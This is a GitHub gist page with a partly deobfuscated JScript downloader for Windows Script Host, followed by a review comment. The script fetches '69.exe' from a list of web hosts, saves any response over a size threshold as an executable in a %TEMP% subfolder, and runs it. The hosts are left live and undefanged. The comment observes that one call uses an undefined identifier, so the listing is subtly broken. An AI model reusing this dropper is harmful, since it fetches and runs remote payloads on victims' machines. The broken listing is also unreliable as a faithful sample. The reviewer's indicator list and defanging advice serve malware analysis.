danieltroger revised this gist
Mar 9, 2016 . No changes.There are no files selected for viewing
-
danieltroger created this gist
Mar 9, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,49 @@ // https://gist.github.com/danieltroger/8080a76239578eff723d var O = ["howareyouqq.com/69.exe?", "google.com/69.exe?", "?", "?", "?"]; var ast = WScript.CreateObject("WScript.Shell"); var kuI = ast.ExpandEnvironmentStrings("%TEMP%\\"); var QrA = new ActiveXObject("Scripting.FileSystemObject"); var fQKx = kuI + "dYFjTAa\\"; try { QrA.CreateFolder(fQKx); } catch (PMPYQL) { } var Fx = WScript.CreateObject("MSXML2.XMLHTTP"); var DUF = WScript.CreateObject("ADODB.Stream"); var NjB = 0; var x = 1; var wvHeGWp = 782965; var M = NjB; for (;true;) { var yl = 0; try { Fx.open("GET","http://"+O[M]+x,false); Fx[send](); if (Fx.status == 200) { DUF.open(); DUF.type = 1; DUF.write(Fx.responseBody) if (DUF.size > 182126) { yl = 1; DUF.position = 0; DUF.saveToFile(fQKx + "782965.exe",2); try { var _this = WScript.CreateObject("Wscript.Shell"); _this.Run(fQKx + "782965.exe", 1, 0); break; } catch (Qh) { } } DUF.close(); } if (yl == 1) { /** @type {number} */ NjB = M; break; } } catch (Qh$$1) { } M++; } ;
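Review bot: The listing is committed with live, clickable download hosts in the `O` array and no header saying what the file is; an analysis copy of a sample should defang its indicators and describe itself in its first lines. I would add a header such as `// Deobfuscated WSH/JScript downloader sample, analysis copy; hosts defanged` and write the first host as `howareyouqq[.]com/69.exe?`. The behaviour visible here is a script host fetching over `MSXML2.XMLHTTP`, writing the response with `ADODB.Stream` to `%TEMP%\dYFjTAa\782965.exe` once it exceeds 182126 bytes, and starting it through `WScript.Shell` `Run`. A short comment listing those artefacts (folder name, file name, size threshold, the three COM objects) would make the file usable as a hunting reference. Also, `Fx[send]` uses an identifier that is not defined anywhere in the listing, so this is probably not a faithful rendering of the original and should be labelled as a partial deobfuscation.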